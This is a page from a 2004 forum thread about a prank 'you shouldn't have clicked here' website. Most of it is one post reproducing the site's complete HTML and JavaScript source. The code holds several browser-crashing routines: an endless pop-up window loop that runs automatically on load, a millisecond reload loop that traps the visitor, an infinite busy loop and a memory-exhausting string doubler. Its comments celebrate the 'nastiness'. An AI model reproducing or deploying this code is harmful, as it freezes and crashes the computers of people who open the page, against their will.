Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17

Thread: Whats that website...?

  1. #11

  2. Lounge   -   #12
    orcutt989's Avatar Blargh
    Join Date
    Dec 2003
    Location
    States
    Posts
    2,186
    Is it that one that goes. YOU ARE AN IDIOT. Over and over again?

    Ah, Norton reported 2 Trojans that it couldnt fix! Windows Bomb?
    Last edited by orcutt989; 11-28-2004 at 04:00 AM.

  3. Lounge   -   #13
    Anal Cunt
    Guest
    is this it?
    Last edited by Afronaut; 11-28-2004 at 04:50 AM.

  4. Lounge   -   #14
    Vargas's Avatar gone fishin'
    Join Date
    Jul 2003
    Location
    the poopdeck
    Posts
    1,878
    Quote Originally Posted by orcutt989
    Ah, Norton reported 2 Trojans that it couldnt fix! Windows Bomb?
    Next time don't click where it says not to you should learn to listen to what it says.

  5. Lounge   -   #15
    Keikan's Avatar ........
    Join Date
    Apr 2003
    Location
    Edmonton (Not Enfield)
    Age
    35
    Posts
    3,743
    wtf?
    Ohh noo!!! I make dribbles!!!

  6. Lounge   -   #16
    I removed the ad code. Nothing happens really. Of course that depends on the browser I think..

    Code:
    <!===================================================>
    <!          DINO-SOFT         SOFTWARE               >
    <!===================================================>
    <!             Paul Bryant  Owner                    >
    <!             Java compliments of                   >
    <!             javascripts.com                       >
    <! I have however rearanged several of them and put  >
    <! some of my own stuff into most of the ones i got  >
    <! from them go there if you want good javascripts   >
    <!===================================================>
    
    
    
    
    
    
    
    <HEAD>
    <TITLE>You Shouldn't Have Clicked Here</TITLE>
    <META HTTP-EQUIV="Refresh"
                         CONTENT="5;WindowBomb()">
    </HEAD>
                         <body>
     <P align="left"><font face="Verdana" size="2"><b>You'll have to restart your
     computer.&nbsp; Next time don't click
     where it says not to, you should learn to listen to what it says.&nbsp; Wahoo
     look at all the little windows opening up, wait till they slow your computer
     down how great is that?&nbsp; I suggest that you go get some Mountain Dew and a
     Nutty Bar or two and just watch all the little windows open and open and open
     or you could just restart your computer and accept the fact that you clicked
     where you weren't supposed to.&nbsp; Have a good day and remember to come back
     to BobTheKing.com</b></font><P align="left"><font face="Verdana" size="2"><b>For
     those of you that clicked on this through Sam Scharenbroch's profile please
     wait hell is not currently completely frozen over. </b></font>
    
     <CENTER><P><img border="0" src="images/Drunk.jpg" width="254" height="163"><BR>
    <SCRIPT LANGUAGE="JavaScript"><!--GÖM FUNKTION START
    
    
    
    
    
    
    
     
    
    // Keep opening windows over and over again
    
    
    
    
    
    
    
    function WindowBomb()
    
    
    
    
    
    
    
    {
    
    
    
    
    
    
    
        var iCounter = 0    // dummy counter
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
        while (true)
    
    
    
    
    
    
    
          {
    
    
    
    
    
    
    
            window.open
    
    
    
    ("http://www.bright.net/~pbryant/freestuff.html","CRASHING" + iCounter,"width=1,height=1,resizable=no")
    
    
    
    
    
    
    
            iCounter++
    
    
    
    
    
    
    
          }
    
    
    
    
    
    
    
    }
    
    
    
    
    
    
    
    // Not as interesting as the other bombs, but this one forces the user to
    
    
    
    // stay at the current page.  User cannot switch to another page, or click
    
    
    
    // stop to stop the reloading.
    
    
    
    
    
    
    
    function ReloadBomb()
    
    
    
    
    
    
    
    {
    
    
    
    
    
    
    
       history.go(0)                         // reload this page
    
    
    
    
    
    
    
       window.setTimeout('ReloadBomb()',1)   // tell netscape to hit this function
    
    
    
    
    
    
    
                                             // every milisecond =)
    
    
    
    
    
    
    
    }
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    // Not a very interesting bomb, it does nothing really :>
    
    
    
    
    
    
    
    function WhileLoopLock()
    
    
    
    
    
    
    
    {
    
    
    
    
    
    
    
       while (true){}
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    }
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    var szEatMemory = "GOBBLEGOBBLE"  // our string to consume our memory
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    // Now this function EatMemoryInTime is a interesting one that could be 
    
    
    
    
    
    
    
    // placed on a timer for maximum nastiness :>  I have been able to get 
    
    
    
    
    
    
    
    // up to 4Megs consumed by Netscape forcing my machine to crawl =)
    
    
    
    
    
    
    
    // AND it's time driven!  No while loops here!
    
    
    
    
    
    
    
    function EatMemoryInTime()
    
    
    
    
    
    
    
    {
    
    
    
    
    
    
    
        szEatMemory = szEatMemory + szEatMemory                    // keep appending
    
    
    
    
    
    
    
        window.status = "String Length is: " + szEatMemory.length  // report size
    
    
    
    
    
    
    
        window.setTimeout('EatMemoryInTime()',1); 
    
    
    
    // tell netscape to hit this function 
    
    
    
    
    
    
    
    }
    
    WindowBomb()
    
    // GÖM FUNKTION SLUT --></SCRIPT><FORM method=post name="FormAction" action="mailto:" +"[email protected]"><INPUT TYPE="button" value="CLICK HERE" Name="btnExplodeWindows" onClick="WindowBomb()"><BR>
     </CENTER>
    
    <CENTER><P><BR>
    </P></CENTER>
     </CENT>
     <P>
    
    <HR>
                         </form>
                         <IMG WIDTH="250" HEIGHT="110" ALT="splash
                         screen" SRC="atomic.gif">
                         
    
    
    </body>
    Last edited by Ariel_001; 11-28-2004 at 05:46 AM.

  7. Lounge   -   #17
    BigDaddy555's Avatar ONE MIN. NINE SEC.
    Join Date
    Mar 2004
    Location
    Texas!
    Age
    47
    Posts
    763
    Quote Originally Posted by mofos
    Most annoying webpage?
    I have the script for that......


Page 2 of 2 FirstFirst 12

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •